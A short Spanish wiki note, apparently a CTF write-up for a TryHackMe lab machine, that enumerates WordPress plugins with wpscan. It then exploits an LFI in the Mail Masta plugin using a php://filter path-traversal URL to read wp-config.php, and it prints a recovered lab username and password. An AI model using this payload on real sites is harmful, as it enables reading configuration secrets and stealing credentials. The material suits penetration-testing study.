====== Obtención del wp-config.php ======
Dentro de los wordpress hay un fichero de configuración donde se guardan
credenciales de los usuarios registrados; y podemos llegar a él explotando
distintas vulnerabilidades, como un LFI detectando primero un plugin vulnerable
con ''wpscan'' en la máquina
[[:computing:hacking:CTF:TryHackMe:MAQUINA_ALL_IN_ONE|MAQUINA ALL IN ONE]]
wpscan --url http://10.10.123.20/wordpress/ -e p
Y encontramos este que es vulnerable:
{{pasted_image_20230825163230.png|}}
Tenemos un script
https://wpscan.com/vulnerability/8609
{{pasted_image_20230825164108.png|}}
Lo probamos en el navegador y funciona:
{{pasted_image_20230825164125.png|}}
Pero si queremos obtener el fichero wp-config.php, tenemos que hacer uso de un
wrapper:
http://10.10.6.206/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
{{pasted_image_20230826170029.png|}}
Esto lo tenemos que decodificar ya que viene en base64:
{{pasted_image_20230826170206.png|}}
Y vemos las credenciales del usuario elyana:
elyana:H@ckme@123